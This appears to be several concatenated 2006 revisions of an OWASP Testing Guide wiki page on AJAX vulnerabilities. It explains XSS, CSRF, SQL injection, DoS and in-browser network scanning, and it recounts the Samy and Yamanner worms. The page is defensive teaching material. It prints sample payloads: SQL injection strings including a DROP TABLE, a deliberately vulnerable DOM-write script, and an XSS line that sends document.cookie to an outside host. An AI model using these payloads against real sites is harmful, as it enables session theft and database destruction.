For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Venkman''' [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. 
''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 
*[http://ajaxpatterns.org AJAX Patterns]

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T11:05:00Z

Anushshetty: /* Testing Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Venkman''' [http://www.mozilla.org/projects/venkman/ Venkman]is the code name for Mozilla's JavaScript Debugger. Venkman aims to provide a powerful JavaScript debugging environment for Mozilla based browsers. ,br> 
''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 
*[http://ajaxpatterns.org AJAX Patterns]

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:49:33Z

Anushshetty: /* References */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 
*[http://ajaxpatterns.org AJAX Patterns]

;'''Whitepapers''' 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman.pdf Billy Hoffman, "Ajax(in) Security",SPI Labs] 
*[http://www.blackhat.com/presentations/bh-usa-06/BH-US-06-Hoffman_web.pdf Billy Hoffman, "Analysis of Web Application Worms and Viruses",SPI Labs] 
*[http://www.spidynamics.com/assets/documents/AJAXdangers.pdf Billy Hoffman, "Ajax Security Dangers",SPI Labs] 

;'''Articles''' 
*[http://www.adaptivepath.com/publications/essays/archives/000385.php Jesse James Garrett. “Ajax: A New Approach to Web Applications”, Adaptive Path] 
*[http://www.webappsec.org/projects/articles/071105.html Amit Klein. "DOM Based Cross Site Scripting or XSS of the Third Kind : A look at an overlooked flavor of XSS", Web Application Security Consortium] 

{{Category:OWASP Testing Project AoC}}

Testing for AJAX Vulnerabilities (OWASP-AJ-001)

2006-11-10T10:47:40Z

Anushshetty: /* Testing Tools */

[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]] 
{{Template:OWASP Testing Guide v2}}

== Introduction ==
 
'''Asynchronous Javascript and XML (AJAX)''' is one of the latest techniques used by web application developers to provide a user experience similar to that of a local application. Since Ajax is still a new term, not much of a thought has been given towards its security implications.The security issues in Ajax include 
* Create a larger attack surface with many more inputs to secure 

* Expose internal functions of the Web application server 

* Allow a client-side script to access third-party resources with no built-in security and encoding mechanisms 

* Login Information and Intrusion Detection
 

== Attacks and Vulnerabilities ==
 
'''XMLHttpRequest Vulnerabilities''' AJAX uses XMLHttpRequest(XHR) object for all the back-end work.A client sends a request to a specific URL on the same server as the original page and can receive any kind of reply from the server. These replies are often snippets of HTML, but can also be XML, Javascript Object Notation (JSON), image data or anything else that Javascript can process.

Secondly in the case of accessing an AJAX page on a non-SSL connection, the subsequent XMLHttpRequest calls are also not SSL encrypted. Hence the login data is traversing the wire in clear text. Using secure channels HTTPS/SSL which the modern day browsers support is an easiest way to prevent such attacks from happening.

XMLHttpRequest(XHR) objects retrieve the information of all the servers on the web. This could lead to various other attacks like SQL Injection, Cross Site Scripting(XSS) etc.


 

'''Increased Attack Surface''' 
Unlike traditional Web applications that are completely on the server, Ajax applications extend across the client and server which also gives the client some powers.This throws in more additional ways to potentially inject malicious content. 

'''SQL Injection''' SQL Injection attacks are remote attacks on the database by allowing the attacker to modify the data on the database. A typical SQL Injection attack could be as follows 

*'''''Example 1'''''
<pre>
SELECT id FROM users WHERE name='' OR 1=1 AND pass='' OR 1=1 LIMIT 1;
</pre>
This query will always return one row (unless the table is empty) and it is likely to be the first entry in the table. For many applications, that entry is the administrative login; the one with the most privileges. 

*'''''Example 2'''''
<pre>
SELECT id FROM users WHERE name='' AND pass=''; DROP TABLE users;
</pre>
The above query helps in dropping all the tables and destructs the database. 

More on SQL Injection can be found at [http://www.owasp.org/index.php/SQL_Injection_AoC, SQL Injection (OWASP Testing Guide v2)].
 
'''Cross Site Scripting''' Cross Site Scripting is a technique by which mailcious content is injected in the inform of HTML links,Javascripts Alerts or in the form of error messages.XSS exploits can be used for triggering variopus other attacks like cookie theft, account hijacking, and denial of service. 

The Browser and Ajax Requests look identical which the server is incapable of classifying them.I that case we do not know on who made the request in tghe background. A JavaScript can make a request for a resource using Ajax that occurs in the background without the user's knowledge. The browser will automatically add the necessary authentication or state-keeping information
such as cookies to the request. JavaScript code can then access the responseto this hidden request and then send more requests. This expansion of JavaScript functionality increases the possible damage of a Cross-Site
Scripting (XSS) attack. 

Also a XSS attack could send requests for specific pages beside the page the user is currently looking at. This allows the attacker to actively look for certain content, potentially accessing the data.
 
The XSS payload can use Ajax requests to autonomously inject itself into pages, and easily re-inject the same host with more XSS like a virus, all of which can be done with no hard refresh. Thus, XSS can send multiple requests using complex HTTP methods
to propagate itself invisibly to the user. 

*'''''Example'''''
<pre><script>alert("howdy")</script>
<script>document.location='http://www.example.com/pag.pl?'%20+document.cookie</script></pre> 
''Usage:''
<pre>http://example.com/login.php?variable="><script>document.location='http://www.irr.com/cont.php?'+document.cookie</script></pre>
This will just redirect the page to an unknown and a malicious page after logging into the original page from where the request was made.
 

'''Client Side Injection Threats''' 
* ''XSS exploits'' can give access to any client-side data and can also modify the client-side code.
 
* ''DOM Injection'' - It is a type pf XSS injection which happens through the sub-objects ,document.location or document.URL or document.referrer of the Document Object Model(DOM)
<pre>
<SCRIPT>
var pos=document.URL.indexOf("name=")+5;
document.write(document.URL.substring(pos,document.URL.length));
</SCRIPT></pre> 
* ''JSON/XML/XSLT Injection'' - Injection of malicious code in the XML content. 

'''Ajax Bridging''' 
For security purposes, Ajax applications can only connect back to the Website from which they come. For example, JavaScript with Ajax downloaded from yahoo.com cannot make connections to google.com. To allow Ajax to contact third-party sites in this manner, the Ajax service bridge was created. In a bridge, a host provides a Web service that acts as a proxy to forward traffic between the JavaScript running on the client and the third-party site.A bridge could be considered a 'Web service to Web service' connection.An attacker could use this to access sites with restricted access. 

'''Cross Site Request Forgery(XSRF)''' 
CSRF is an exploit where an attacker forces a victim’s web browser to send an HTTP request to any website of their choosing (the intranet is fair game as well). For example, while reading this post, the HTML/JavaScript code embedded in the web page could have forced your browser to make an off-domain request to your bank, blog, web mail, DSL router, etc. Invisibly CSRF could have transfered funds, posted comments, compromise email lists, or reconfigured the network. When a victim is forced to make a CSRF request it will be authenticated if they’ve recently logged-in. The worse part is all system logs would verify that you in fact mad the request. Its’ been done before, only not often, yet. 

'''Denial of Service''' Denial of Service is an old attack where an attacker or vulnerable application force the user to launch multiple XMLHttpRequests to a target application against the wishes of the user. Infact, browser domain restrictions make XMLHttpRequests useless in launching such attacks on other domains. Simple tricks like using image tags nested within a JavaScript loop can do the trick more effectively. AJAX being on the client-side makes the attack easier.<pre><IMG SRC="http://example.com/cgi-bin/ouch.cgi?a=b"></pre>
 
'''Browser Based Attacks''' The web browsers we use haven't been designed with security in mind. Most of the security features available in the browsers are based on the previous attacks. So our browsers are not prepared for newer attacks. 
There have been a number of new attacks on browsers like using the browser to hack into the internal network. The JavaScript first determines the internal network address of the PC. Then, using standard JavaScript objects and commands, it starts scanning the local network for Web servers. These can be computers that serve Web pages, but they can also include routers, printers, IP phones and other networked devices or applications that have a Web interface.The JavaScript scanner determines whether there is a computer at an IP address by sending a "ping" using JavaScript "image" objects. It then determines what servers are running by looking for image files stored in standard places, the traffic it receives back and the error messages it receives. Attacks that target Web browser and Web application vulnerabilities are often conducted by HTTP and, therefore, may bypass filtering mechanisms in place on the network perimeter. And the widespread deployment of Web applications and Web browsers gives attackers a large number of easily exploitable targets. For example, Web browser vulnerabilities can lead to the exploitation of vulnerabilities in operating system components and individual applications, which can lead to the installation of malicious code, including bots.

== Major Attacks ==

'''MySpace Attack''' The Samy and Spaceflash worms both spread on MySpace, changing profiles on the hugely popular social-networking Web site. In ''Samy attack'',the XSS Exploit allowed <SCRIPT> in MySpace.com profile. AJAX was used to inject virus into MySpace profile of any user viewing infected page and forced any user viewing infected page to add user “Samy” to their friend list.It also appended the words “Samy is my hero” to victims profile 

'''Yahoo! Mail Attack''' In June 2006, the Yamanner worm infected Yahoo's mail service. The worm, using XSS and Ajax, took advantage of a vulnerability in Yahoo mail's onload event handling. When an infected email was opened, the worm code executed its JavaScript, sending a copy of itself to all the yahoo contacts of the infected user. The infected email carried a spoofed 'From' address picked randomly from the infected system, which also made it look like an email from a known user.

== Testing ==
[[AJAX_Testing_AoC | 4.9 AJAX Testing ]] 
[[AJAX_How_to_test_AoC | 4.9.2 How to Test AJAX]] 

== Testing Tools ==

Here are some of the '''AJAX Testing Tools''' 
'''Charles''' An HTTP proxy/monitor/Reverse Proxy that enables viewing all HTTP traffic between browser and the Internet, including requests, responses and HTTP headers (which contain the cookies and caching information). Capabilities include HTTP/SSL and variable modem speed simulation. Useful for XML development in web browsers, such as AJAX (Asynchronous Javascript and XML) and XMLHTTP, as it enables viewing of actual XML between the client and the server. Can autoconfigure browser's proxy settings on MSIE, Firefox, Safari. Java application from XK72 Ltd. 

''' Ghost Train''' [http://wiki.script.aculo.us/scriptaculous/show/GhostTrain Scriptaculous's Ghost Train] is a tool to ease the development of functional tests for web sites. It’s a event recorder, and test generating and replaying add-on you can use with any web application. 
'''Squish/Web (froglogic)''' 
[http://www.froglogic.com/squish Squish] is an automated, functional testing tool. It allows to record, edit and run web tests in different browsers (IE, Firefox, Safari, Konqueror, etc.) on different platforms without having to modify the test scripts. Supports different scripting languages for tests. 
'''JsUnit''' [http://www.edwardh.com/jsunit/ JsUnit] is a Unit Testing framework for client-side (in-browser) JavaScript. It is essentially a port of JUnit to JavaScript.

== References ==

*[http://en.wikipedia.org/wiki/AJAX AJAX] 

;'''Whitepapers''' 
